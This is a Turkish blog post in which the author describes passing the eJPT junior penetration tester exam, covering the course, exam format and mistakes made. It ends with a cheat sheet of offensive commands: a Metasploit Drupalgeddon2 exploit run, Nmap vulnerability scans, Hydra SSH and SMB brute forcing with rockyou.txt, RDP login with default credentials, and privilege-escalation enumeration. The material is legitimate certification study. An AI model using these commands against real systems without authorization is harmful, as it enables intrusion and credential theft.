Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. Siber Güvenlik
  4. »
  5. eJPT Sınav Rehberi: Hazırlık Süreci, Araçlar ve Deneyimler

eJPT Sınav Rehberi: Hazırlık Süreci, Araçlar ve Deneyimler

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 5 dk okuma süresi
235 0
eJPT Sınav Rehberi: Hazırlık Süreci, Araçlar ve İpuçları

eJPT Sınav Rehberi: Hazırlık Süreci, Araçlar ve Deneyimler

Merhaba! 22 Kasım’da girdiğim eJPT (eLearnSecurity Junior Penetration Tester) sınavını başarıyla tamamladım ve sertifikayı almaya hak kazandım. Bu yazıda, sınav sürecini, soru tarzlarını, zamanı nasıl yönettiğimi ve bu sertifikayı almak için nasıl hazırlanabileceğinizi detaylı bir şekilde ele alacağım. Kısacası eJPT Sınav Rehberi olarak detaylı bakacağız. 


Sınav Öncesi Hazırlık

 eJPT Sınav Rehberi: Hazırlık Süreci, Araçlar ve İpuçları

eJPT’ye hazırlık süreci, kaliteli ve kapsamlı bir eğitimle başlıyor. Aşağıdaki bağlantıyı kullanarak eğitim platformuna kaydolabilirsiniz:
➡️ eLearnSecurity eJPT Eğitimine Başlayın

  • Fiyat: Aylık 59 dolar (iptal etmezseniz her ay otomatik yenilenir).
  • Sınav Ücreti 200 dolar.
  • İçerik: Eğitim; bilgi toplama, exploit tespiti, sızma testi araçlarının kullanımı gibi konuları kapsıyor.

Eğitim Detayları:

  • Süre: 153 saat
  • Bölüm Sayısı: 4
  • Ders Sayısı: 12
  • Videolar: 240
  • Sınavlar: 200
  • Laboratuvarlar: 93

Benim Deneyimim: Siber güvenlikle uzun yıllardır ilgileniyorum. Bu nedenle eğitimin çoğunu hızlıca geçtim ve 3-4 gün içinde sınava girdim. Ancak siber güvenlik bilginiz sınırlıysa veya yeni başlıyorsanız, eğitimi baştan sona detaylı bir şekilde tamamlamanızı kesinlikle öneririm.

İpucu: Eğitim dili İngilizce, ancak altyazı seçeneği mevcut. İngilizceniz yeterince iyi değilse altyazıyı aktif ederek çalışabilirsiniz.


eJPT Rehberi Sınav Süreci

Sınav hakkında genel bilgiler:

  • Süre: 48 saat
  • Soru Sayısı: 35
    • 5 Flag Gönderme Sorusu
    • 30 Teorik Soru (Makine içi işlemlerle ilgili)
  • Tamamlama Sürem: Sınavı kesin olarak bitirmem 4 saat sürdü.

Hazırlık: Sınavdan önce Linkedin’de eJPT sertifikası alan 2-3 kişiyle iletişim kurarak Pivoting ve Port Forwarding gibi zorlandıkları konular üzerine bilgi alışverişinde bulundum. Bu bilgiler sınav sırasında oldukça faydalı oldu.

Deneyimim: Sınav sırasında dışarı çıkıp ailemle vakit geçirdim, bu süreyi stratejik olarak kullandım. Tavsiyem, internetinizin hızlı olduğu sabah veya öğlen saatlerinde sınava girmenizdir.


Sınavda Yaptığım Hatalar

  1. Not Alma Eksikliği:
    • IP adresleri, portlar ve açıkları düzenli şekilde not almadım. Bu yüzden sürekli geriye dönerek tekrar kontrol yapmak zorunda kaldım ve yaklaşık 1 saat kaybettim.
    •  Sınav sırasında defter veya bir not alma uygulaması kullanarak IP adreslerini, portları ve açıkları mutlaka detaylı bir şekilde not alın.
  2. Flag Sorularında Karışıklık:
    • Flag’leri bulduğumda hemen sisteme girmek yerine biriktirerek işlem yaptım. Bu yüzden bazı flag’leri karıştırdım ve 2 soruyu yanlış cevapladım.
    • Flag bulduğunuz anda sisteme girin, asla biriktirmeyin.

Sınava Yardımı Olabilecek CTF Çözümlerim: CTF ÇÖZÜMLERİ


Sınav Soru Tarzları

Sınavda toplamda 6 makine verildi:

  1. WinServer-01
  2. WinServer-02
  3. WinServer-03
  4. WebServer-01
  5. FTPServer
  6. LinuxServer

Her makinenin bir IP adresi vardı ve bu IP adreslerini düzenli bir şekilde not almanız kritik önem taşıyor. Örneğin, hangi IP hangi server’ı temsil ediyor bunu karıştırmamak gerekiyor.

Başlangıç Adımları:

Metasploit ile Exploit Kullanımı:


# Metasploit başlatma:
msfconsole

# Drupal Exploit arama:
search drupal

# Exploit seçimi:
use exploit/unix/webapp/drupal_drupalgeddon2

# Hedef ayarları:
set RHOST <hedef_IP_adresi>
set TARGETURI /drupal
# Exploiti çalıştırma:
run

Sınav Tool Kullanımları

nmblookup: Hangi Server’a bağlı olduğunu ve detaylı isimleri keşfetmek için.

nmblookup -A 

Nmap: İp aralığındaki tüm ip adreslerini ve portlarını detaylı tarayıp açıkları tespit etmek için.

nmap -sS -sV -p- --script vuln -T4 192.168.1.0/24

Nmap (80. Port Detaylı Tarama):

nmap -sS -sV -sC -p 80 

Nmap (80. Port Güvenlik Açığı Tarama):

nmap -sS -sV --script vuln -p 80

XFreeRDP: Diğer makineye atlamak için.

xfreerdp /u:administrator /p:administrator /v:

Hydra (SMB Brute Force):

hydra -L root -P /usr/share/wordlists/rockyou.txt smb://192.168.100.0

Hydra (SSH Brute Force):

hydra -L root -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.0

WPScan: WordPress CMS taramak için.

wpscan --url 

Enum4linux: SMB ve NetBIOS protokollerine karşı bilgi toplamak için.

enum4linux 

Nikto: Web sunucusunu taramak için.

nikto -h 

Dirb: Tüm dizinleri tespit etmek için.

dirb 

Dirb (Sadece .txt Dosyaları için):

dirb  -X .txt

Linux Yetki Yükseltme: Gtfobins üzerinden araştırma yaparak yetki yükseltmek için.

find / -perm -u=s -type f 2>/dev/null

Windows Yetki Yükseltme:


whoami
whoami /priv
systeminfo

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir